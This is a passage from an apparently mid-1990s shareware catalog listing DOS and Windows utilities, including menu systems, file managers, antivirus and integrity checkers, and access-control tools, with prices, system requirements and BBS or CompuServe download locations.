commissions. + Look for: availability unknown on BBSs; ABMENU.EXE on CompuServe + in CIS:PCUTIL forum LIBrary 5 (or contact userID 72345,1623 for + assistance). + Download size: 126k (about ten minutes with a 2400 baud modem) + Description: + A simple, fast, stay-in-DOS program menu and/or drive/directory + hoper. Directories, programs and descriptions easily added or + deleted from menu list - right on the DOS line with the simple + "D" command. No editing, compiling, etc. + + + Product: BCM Menu System + Author: , 313-292-6097 + Version: 2.2 (01-09-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $49.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of phone, CompuServe, mail support; + 1-month return policy; all ASP-wide offers (see page 5); + discounts on upgrades. + Look for: 22BCM*.ZIP on BBSs (multiple files); BCM*.EXE on + CompuServe in CIS:PCUTIL forum LIBrary 5 (multiple files) (or + contact userID 71470,2225 for assistance). + SWREG#: 1275 + PsL#: 10913 + Download size: 473k (about 35 minutes with a 2400 baud modem) + Description: + Featuring: easy installation & use, online help, encrypted + password protection, automatic screen save, uses less than 1k + mem while running programs, can launch windows, dual directory + and tree windows, fast disk duplication, file find, support for + ZIP, ARC, LZH & ARJ compress methods, uses you virus scanner to + scan compressed files, can use other utilities, text editor + with clipboard an much much more. + + + Product: CMFiler + File manager for DOS. See full description on page 157. + + Chapter 2, "Utilities" 163 + + + + Product: Double Directory + File/disk manager; 2 directories side-by-side. See full + description on page 29. + + Product: ELFTREE + Author: , 217-698-8600 + Version: 3.01S (12-28-93) + Needs: IBM PC, DOS 2.0 or better. 300k RAM. + Strongly recommended: Hard disk. + Registration fee: 50.00Y + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited tollfree 800# phone, fax, + BBS, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 5); discounts on other products. 1 free + update disk(s) sent out. + Look for: availability unknown on BBSs; ET301.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 5 (or contact userID 73077,3605 for + assistance). + Download size: 209k (about 16 minutes with a 2400 baud modem) + Description: + Packs 100s of file, directory and program management utilities + into a compact, slick package. Mouse support! Can remember tree + maps for CDROM disks, which eliminates the need to rescan for + each access. Support for user-defined menus of up to 100 items + per menu, with submenus 10 levels deep. Fast, works on large + hard disks or network machines with ease. Can prune directories + or graft them from one drive to another (even on networks). + + + Product: ENTER-EASE + Author: + Version: 1.1 (09-29-94) + Needs: IBM PC, DOS 3.0 or better. Hard disk. + Registration fee: $35.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, mail support; lifetime return + policy; bonus utilities; all ASP-wide offers (see page 5). + Attractive carrying case. + Look for: ENTER_E.ZIP on BBSs; ENTERE.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 5; ENTER_E.ZIP on GEnie in IBMPC forum + LIBrary 15. + PsL#: 11567 + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Makes DOS better than Windows. This DOS shell lets you manage + your hard disk without having to learn complex commands or + answer needless questions. It displays the key needed to + activate a command on the screen so there is no memorization + necessary. All the keys are centered around the numeric keypad + so if you can't type you can still initiate commands quickly, + much faster than with a mouse. You can do all your file + management, and much more, while drinking coffee! + + Chapter 2, "Utilities" 164 + + + + Product: Hard Disk Director + Author: , 415-382-7999 + Version: 5.2 (03-15-92) + Needs: IBM PC, DOS 2.1 or better. Hard disk. + Registration fee: $40.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of phone, CompuServe, mail support. + Look for: availability unknown on BBSs; HDD1.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 5 (multiple files) (or contact userID + 74774,554 for assistance). + Download size: 330k (about 25 minutes with a 2400 baud modem) + Description: + A series of programs making up a complete hard disk menu, shell + and file manager. + DL.EXE full featured shell. You can mark selected + directories or files for copying, moving or + removing. + DB.EXE gives you a sorted file list for any directory. + DA.EXE shows you all the files on a particular drive or + drives. + DM full featured hard disk menu. You can add up to + 20 entries to the main menu and have unlimited + submenus of up to 20 entries each. + + + Product: Katelin Comment Manager + Full featured file/comment manager. See full description on + page 54. + + Product: UltiMenu + Author: , 212-334-1243 + Version: 1.00 (08-19-94) + Needs: IBM PC, DOS 3.3 or better. 512k RAM; CGA monitor; Hard + disk. + Strongly recommended: VGA monitor; Hayes-compatible modem; + Mouse. + Registration fee: $25.00 + Registration benefits: lifetime unlimited phone, fax, BBS, mail + support. + Look for: UMENU100.ZIP on BBSs (call 718-716-6198 to download it + at no charge); UMENU100.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Removes itself completely from system memory for running + programs; 18 categories with up to 18 programs per category are + supported; mouse support; fully configurable; context sensitive + on-line help; offers many built in utilities such as a file + handler, screen blanker, contact manager and label manager. + + Chapter 2, "Utilities" 165 + + + + Product: XMENU + Author: + Version: 1.0a (11-22-93) + Needs: IBM PC, DOS 2.0 or better. 128k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $12.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 12 + months of mail support; bonus utilities. 1 free update disk(s) + sent out. + Look for: XMENU10A.ZIP on BBSs. + Download size: 17k (about two minutes with a 2400 baud modem) + Description: + Small, fast shell for LHA, PKZIP, ARJ, ZOO, PAK, PKPAK and ARC. + Self-lists the contents of archives; shells to appropriate + archiver to view, extract, delete, or freshen files. File + manager interface, with tagging, sorting, and searching. Fully + customizable by editing text of XMENU.CFG. Converts to self- + extracting archives. Will salvage damaged LZH files that LHA + itself cannot read. Works on any PC compatible system. + + + 2.7.4 MS/FMs for developers + + Product: ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 163. + + 2.7.5 Work environment managers + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 106. + + Product: Button Manager for Windows + Author: , 613-841-6020 + Version: 1.3b (01-10-95) + Needs: IBM 80386, Windows 3.1 or better. Mouse; VBRUN300.DLL. + Registration fee: $20.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, mail support; 3-month limited return + policy; all ASP-wide offers (see page 5). Lifetime free + upgrading allowed. + Look for: SMLBMG.ZIP on BBSs; SMLBMG.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 9 (or contact userID 70252,1364 for + assistance). + SWREG#: 2823 + PsL#: 11559 + Download size: 155k (about twelve minutes with a 2400 baud modem) + Description: + A multi-icon-bar Windows utility that provides quick access to + applications. Program Manager groups and icons are + automatically reflected; each group becomes a resizable button + + Chapter 2, "Utilities" 166 + + + + bar that can separately be opened and placed anywhere on the + desktop. Program desc shown in title bar as cursor glides over + each icon. Designate some or all to stay on top, min, max, or + cascade. Desktop set-up remembered. Professional installation + program sets up application and icons in one minute. No other + setup required. + + + Product: ELFTREE + Packs 100s of file/dir/pgm management utils. See full + description on page 163. + + Product: New Menus for Windows + X-Win/Win4 like shell and desktop enhancement. See full + description on page 156. + + Product: Program Group Specialist + Author: , 404-594-7500 + Version: 1.0 (05-23-95) + Needs: IBM AT (80286), Windows 3.1 or better. CGA monitor; + Mouse; VBRUN300.DLL. + Registration fee: $20.00 (add $2.50 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; choice of 31/2" or 51/4" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; 3-month return policy; royalty-free runtime license; + LAN license; site license; all ASP-wide offers (see page 5). + 6-month free upgrading allowed. + Look for: availability unknown on BBSs; RIGS10.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 4 (or contact userID 75350,205 + for assistance). + Download size: 48k (about four minutes with a 2400 baud modem) + Description: + RI-group Specialist makes adding icons to your Program Manager + simple: select a group to add to and then double click on the + program you want to add. Fully functional. + + + Product: SmilerShell + Windows cmdline, control center, launcher. See full + description on page 179. + + Chapter 2, "Utilities" 167 + + + + Product: Super Stuff Utilities + Author: , 817-382-7585 + Version: 3.1 (10-11-93) + Needs: IBM AT (80286), Windows 3.1 or better. 300k RAM; VGA + monitor; Hard disk. + Strongly recommended: Mouse. + Registration fee: $20.00 (add $5.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; bonus utilities; all + ASP-wide offers (see page 5); discounts on other products. + Look for: availability unknown on BBSs; SUPERS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 9 (or contact userID 70323,3140 + for assistance). + Download size: 300k (about 23 minutes with a 2400 baud modem) + Description: + A set of Windows based utilities. A fully configurable task + manager that features a run command w/history, launch menu, and + a multi-select list box. A utility that allows you to display + your Program Manager groups anywhere on the desktop. View as + vertical lists, toolbars, or standard groups. Finally, a + Wallpaper manager with cycle support is also included. + + + Product: Teleshare/DOS Remote Access + Basic DOS remote control. See full description on page 392. + + 2.7.6 Software tools + + 2.7.6.1 For multiple programs + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 101. + + Product: EXTENDED BATCH LANGUAGE-PLUS! + The real batch language you wish DOS had. See full description + on page 102. + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 164. + + + 2.8 Security programs + + "Shareware is as safe as [retail] software if obtained + directly from an author or from a vendor or BBS who + has gotten the disk directly from the author." + - an official ASP statement on shareware + + Chapter 2, "Utilities" 168 + + + + See also: Utilities, File utilities, Backup/restore; Utilities, + File utilities, File encryption; Utilities, File utilities, + File archiving & compression; Utilities, File utilities, File + comparison; Utilities, System utilities, Recovery utilities. + + Product: DaMenu + A premier point & shoot DOS menu. See full description on + page 153. + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 155. + + 2.8.1 Virus/Trojan detectors + + Product: FileSafe + Easy, foolproof virus detection system. See full description + on page 171. + + Product: Flu_Shot+ + Author: , 914-586-2023 + Version: 1.83 (07-11-93) + Needs: IBM PC, DOS 2.1 or better. 16k RAM. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $15.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime phone, fax, BBS, CompuServe, GEnie, mail support; + discounts on upgrades. + Look for: FSP*.ZIP on BBSs (call 212-889-6438 to download it at + no charge); FSP*.ZIP on CompuServe in CIS:PCUTIL forum LIBrary + 3 (or contact userID 72461,3212 for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + An active monitoring program for detecting and preventing + computer viruses and insures the integrity of the programs you + use on your system. By selecting the various levels of + protection you wish to install on your system, you can be sure + that the program you are about to run is only the program you + wanted to run and does not contain any computer viruses. + + Winner of PC Magazine's Editor Choice award. Updated on a + regular basis. + + Chapter 2, "Utilities" 169 + + + + Product: Integrity Master(tm) + Author: , 904-574-0920 + Version: 2.11a (11-04-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $35.00 (add $4.50 for shipping to U.S. + addresses) (add $4.50 for shipping to Canadian addresses) (add + $9.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); 12 months of phone, fax, + BBS, CompuServe, GEnie, mail support; 2-month return policy; + bonus utilities; bonus data; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products; + discounts on upgrades. 3-year virus protection guarantee. + Look for: I-M*.ZIP on BBSs (call 904-386-8693 to download it at + no charge); I-MAST.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 3 (or contact userID 72571,3352 for assistance); I- + M*.ZIP on GEnie in M1530 forum LIBrary 1 (or contact userID + W.STILLER for assistance). + SWREG#: 373 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, PC Magazine/Ziff-Davis + Interactive Shareware Awards. + Description: + A powerful anti-virus and data integrity product. Scan for + viruses and get the extra benefits of CMOS protection, + security, change control, and disk problem detection. Do you + have a flaky hard disk? Did someone change a file while you + were out? Find out for sure! IM enables detection of any virus + (not just "known" ones) and doesn't require periodic updates, + although it recognizes known viruses by name. Unlike its + competition, IM identifies damage caused by a virus, not just + viral infections. + + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 94. + + Chapter 2, "Utilities" 170 + + + + Product: Virus Simulator + Author: , 805-541-0910 + Version: 2C (01-01-93) + Needs: IBM PC, DOS 3.1 or better. 64k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Strongly recommended: Hard disk. + Registration fee: $25.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited fax, mail support; LAN license; bonus + utilities; all ASP-wide offers (see page 5). Bonus "MtE", Boot + sector, & companion virus supplements. + Look for: VIRSIM2C.ZIP on BBSs (multiple files) (call + 805-258-6172 to download it at no charge). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Safely demonstrate your anti-virus protection. Selected as + + + 2.8.2 Virus cleanup/removal + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 168. + + 2.8.3 System activity monitors + + Product: Activity Monitor + Author: + Version: 1.1 (07-31-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; EGA monitor; Hercules monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: VGA monitor; Mouse; XMS memory. + Registration fee: $15.00 (add $2.50 for shipping to U.S. + addresses) (add $2.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); 3 months of unlimited phone, fax, CompuServe, mail + support; all ASP-wide offers (see page 5). 3-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: availability unknown on BBSs; AMON11.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 10 (or contact userID 72202,3662 + for assistance). + SWREG#: 2444 + PsL#: 11466 + Download size: 115k (about nine minutes with a 2400 baud modem) + Description: + A small utility designed to monitor all activity on a computer + running Windows 3.1 or later. It keeps an encrypted log. Can + read, print or generate an activity report from the log file. + Can run under the Stealth (invisible) mode, or under the + Visible mode. Five different installation options to suit your + + Chapter 2, "Utilities" 171 + + + + needs, with de-installation routines. Best features, best + documentation, best support, easiest in its class! + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 168. + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 294. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 94. + + 2.8.4 File integrity monitors + + Product: FileSafe + Author: , 416-751-5678 + Version: 1.02 (05-15-94) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 5). + Look for: FLSF102.ZIP on BBSs (call 519-940-0007 to download it + at no charge). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + A virus detection system that protects your computer from virus + attack by alerting you to unexpected changes in your executable + files or boot record. Unlike other CRC-based utilities, this + uses a sophisticated message digest algorithm that cannot be + inverted. FileSafe can detect any changes no matter how well + covered. FileSafe is easy to use, unobtrusive, takes up little + space and comes with a comprehensive users manual that + discusses viruses and strategies for using FileSafe. + + + Product: Flu_Shot+ + Virus detection/prevention via active monitor. See full + description on page 168. + + Product: Integrity Master(tm) + Easy to use anti-virus/data integrity prog. See full + description on page 168. + + Chapter 2, "Utilities" 172 + + + + Product: Master Disk + Prepares diskette masters for duplication. See full + description on page 25. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 43. + + Product: System Monitor + Monitor, detect & report problems early. See full description + on page 94. + + Product: Virus Simulator + Safely audit & demonstrate virus protection. See full + description on page 169. + + 2.8.5 Computer access security + + See also: Utilities, Menu systems & file managers. + + Product: DATA PROTECTOR + Author: + Version: 2.00 (02-01-95) + Needs: IBM PC, DOS 3.0 or better. 640k RAM; Hard disk. + Registration fee: $35.00 + Registration benefits: 31/2" master disk(s); 3 months of fax, + CompuServe, mail support; all ASP-wide offers (see page 5). + Look for: PIGAS.ZIP on BBSs; PIGAS.EXE on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 72172,2063 for + assistance). + PsL#: 11015 + Download size: 225k (about 17 minutes with a 2400 baud modem) + Description: + Protect the information in your PC against unauthorized access. + The protected data becomes totally unavailable even when using + a powerful disk utility or booting from a diskette. Unlimited + number of users, each one having a unique password. Full report + about authorized/unauthorized activity in the system. Fast + hide/open operation. Easy configuration program to allow + selection of data to hide. Simple call to login/logout program + to start or end a user session. + + + Product: Kidproof for Windows [***] + Secure desktop for kids. See full description on page 116. + + Chapter 2, "Utilities" 173 + + + + Product: Local Access Logon + Author: + Version: 2.12 (10-12-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; LALOG*.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 100120,2335 + for assistance). + SWREG#: 1947 + Download size: 390k (about 29 minutes with a 2400 baud modem) + Description: + Permits a system administrator to define users (max 500) and + groups (max 100). Each user group defines the access rights of + all member users and defines the start application or + accessible Program Manager groups. The system administrator may + define a Windows or MS-DOS application as the program that + starts up after the user logged on with a valid username/ + password pair. Each user group describes the access rights. May + users enter the DOS prompt? May users install applications? + Etc. + + + Product: PUBLIC ACCESS(tm) + Front-end control for public PC access. See full description + on page 294. + + Product: WinSecure + Personal screensaver w/password & messages. See full + description on page 70. + + + 2.9 Software tools & add-ins + + 2.9.1 For multiple programs + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 155. + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 432. + + Chapter 2, "Utilities" 174 + + + + Product: SensuVoX I + Author: , 816-429-3558 + Version: 0.00 (01-29-95) + Needs: IBM 80386, Windows 3.1 or better. sound card. Program + capable of playing WAVs. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; bonus data; all ASP-wide offers (see page 5); + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. + Look for: SVOXI.ZIP on BBSs (call 317-784-2147 to download it at + no charge); SVOXI.ZIP on CompuServe in CIS:WINFUN forum LIBrary + 5 (or contact userID 70272,3317 for assistance). + SWREG#: 4508 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + SensuVoX I is a collection of over 500 WAV files from 5 + different vocalists designed to work with speech programs + within Windows. It allows you to give your PC a "Sensual + Voice". The project has over 100 standard Window's commands, + Solitaire commands, talking clock, and "TastyBits" + (miscellaneous and provocative comments) from each of the + vocalists. This set features four female (Ciara, Oceania, + Linda & Sheree) and one male (Pete) vocalist. All WAVs are in + English in this set. + + + 2.9.2 For operating systems + + See also: Utilities, System utilities, Operating systems; + Utilities, System utilities, Multi-OS utilities. + + 2.9.2.1 MS-DOS + + See also: Utilities, Software tools & add-ins, For JP Software, + For 4DOS/NDOS. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 36. + + 2.9.2.2 Windows + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 101. + + Product: AMF Daily Planner & P.I.M. + Hot! The best & easiest PIM for Windows. See full description + on page 118. + + Chapter 2, "Utilities" 175 + + + + Product: AMF Intelligent Organ for Win + Organ for Windows - play it with your mouse! See full + description on page 558. + + Product: AMF Multimedia Jukebox (WIN) + Author: + Version: 1.0 (05-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. sound card; + VBRUN300.DLL. Video Extensions (for Video). + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: JBOX.ZIP on BBSs; JBOX.ZIP on CompuServe in CIS:WINSHA + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3386 + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Now you can play any Multimedia file that you have drivers/ + extenions for as many times as you want. Queue as many + selections as you would like, save the lists, and with one + click have your pre-programmed list playing. Will play AVI, + MOV, WAV, VOC, FLI, FLIC, MIDI, etc. Can act as just a simple + multimedia player as well. Has a beautiful 3D interface. Easy + to use. Full help included. + + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 165. + + Product: ClipMate for Windows + Author: , 716-227-6505 + Version: 3.13 (09-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; VGA + monitor; Hard disk; Mouse. + Registration fee: $25.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; disks of + other shareware; discounts on upgrades. 1-month free upgrading + allowed. + Look for: CLIPMT31.ZIP on BBSs; CLIPMT31.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 6 (or contact userID 70743,2546 for + assistance). + SWREG#: 173 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Remembers all items that you copy to the Windows Clipboard. + Lets you view, edit, combine, and print clipboard data. Support + for most clipboard formats, including BMP, Picture, RTF, OLE, + and More! Exclusive PowerPaste(tm) provides rapid pasting into + + Chapter 2, "Utilities" 176 + + + + applications. New features: Auto-Save, Compatible with Windows + 95. + "ClipMate turns the Windows Clipboard from an + underpowered utility into a true power tool." - PC + Computing + + + Product: CommEx + Author: , 913-663-3022 + Version: 1.12 (09-25-95) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 5); discounts on other products; + discounts on upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + PsL#: 14153 + Download size: 190k (about 14 minutes with a 2400 baud modem) + Description: + Common dialog extensions for Windows 3.1/3.11. Adds file + management functions like Find, Copy, Delete, Rename, and + MakeDir to the Open and Save dialogs of most Windows + applications. No more jumping back and forth between your + application and File Manager or DOS to do common functions! + Search every disk drive at once for files (multiple masks, + too!) Make a new directory as you save files, delete old + versions, make backups before you open a file, etc. - all from + the Open/Save dialog! + + + Product: Elbow Grease for Windows v1.0 + Author: + Version: 1.0 (05-02-95) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: ELBOW.ZIP on BBSs; ELBOW.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3048 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This little program sits on the bottom of your screen in only + 1.5 inches. Has a "double toolbar" which allows up to 40 + programs to be launched with one click. Full-sized icons and + user-specified ToolTips. Has a to-do List, and perpetual + calendar to the year 9000. Has drag & drop File Manager + + Chapter 2, "Utilities" 177 + + + + launching, games like Tic Tac Toe, and a whole slew of other + utiltites. Easy to use and operate, Full help included. + + + Product: File Finder for Windows + Author: , 314-781-8709 + Version: 3.0 (08-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $20.00 (add $3.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; discounts on upgrades. 1 free update disk(s) sent + out. + Look for: WFIND30.ZIP on BBSs (call 314-638-3041 to download it + at no charge); WFIND.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 73613,3606 for assistance). + SWREG#: 3540 + PsL#: 11569 + Download size: 95k (about seven minutes with a 2400 baud modem) + Description: + A file search program for Windows 3.1. It can search all + drives, and can search the most popular archive types. (ARC, + ARJ, ZIP, ZOO, LBR, LZH, PAK, and PKA.) The list of files can + be printed or copied to other applications. Search types + include standard DOS, substring, regular expressions, date, + time, and size. Launch applications based on filetype. "After + using it once, I deleted from my system all other pretenders." + Earl Watt, The Computer Power Station. + + + Product: Free System Resources + Notification of low memory resources. See full description on + page 61. + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 319. + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 347. + + Chapter 2, "Utilities" 178 + + + + Product: Mouse Clock (tm) for Windows + Author: + Version: 2.0 (08-08-95) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 5). 1-month free upgrading allowed. + Look for: MCLOCK.ZIP on BBSs; MCLOCK.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3250 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Virtually becomes part of the cursor. It displays the current + time in US or 24-hr versions, seconds, free system resources, + and if the rate clock is active, the current total. Totally + configurable. Easy to use. Beneficial utility for WinCIM users! + It's smart, you can tell it when to stay out of the way, or + have it always on top. Never interferes with your mouse + operations. Great little utility! + + + Product: Papers + Author: , 518-438-5548 + Version: 1.00 (12-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 5). + Look for: availability unknown on BBSs; PAPERS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0. + Download size: 89k (about seven minutes with a 2400 baud modem) + Description: + bla + + + Product: Playground + Tool for building object models. See full description on + page 399. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 36. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 43. + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 25. + + Chapter 2, "Utilities" 179 + + + + Product: Screen Saver Sampler + Windows screen saver with password protection. See full + description on page 70. + + Product: SmilerShell + Author: , 510-526-8470 + Version: 3.0 (03-29-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $9.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 5); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; SMISHL.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 9 (or contact userID 72340,375 + for assistance). + SWREG#: 1186 + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This Windows control center & cmdline takes NO screen space! + Right-click on roving titlebar button to launch from your + favorite-apps list, or switch to running app. Left-click pops + up ultimate Win cmdline: runs DOS & WIN pgms, pipes/redir; + hist/edit/srch; aliases (type-in or Fn key); fast dir change + over multiple drives; find files by name or contents; cal/ + clock, curr dir, Win mem/rsrcs, more! "Best Util 1994" finalist + (SIA) "Must-have, recommended" (Windows Mag) "Brilliant" (PC + Plus) + + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 189. + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 50. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 372. + + Product: Win Change + Globally find and change text in files. See full description + on page 59. + + Product: Win Multiple Configurations + Allows 100 different Windows configurations. See full + description on page 110. + + Chapter 2, "Utilities" 180 + + + + Product: WinZip + Windows ZIP util w/drag & drop, built-in ZIP. See full + description on page 45. + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 47. + + 2.9.2.3 OS/2 + + Product: RexxBase + The dBase Database For Rexx. See full description on page 400. + + 2.9.3 For JP Software + + See also: Utilities, Software tools & add-ins, For Norton. + + Product: 4EDIT + Author: , 703-821-3215 + Version: 2.00 (03-06-94) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: quick-reference card; choice of 31/2" or 51/4" + master disk(s); 6 months of unlimited phone, CompuServe, mail + support. lifetime return policy. 6-month free upgrading + allowed. + Look for: 4EDIT20.ZIP on BBSs; 4EDIT.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 1 (or contact userID 70741,3711 for + assistance). + Download size: 117k (about nine minutes with a 2400 baud modem) + Description: + DESCRIPTION editor for use with 4DOS. Has important features. + Windowed editor shows the entire description, making it easy to + attach descriptions (up to 200 chars) to your 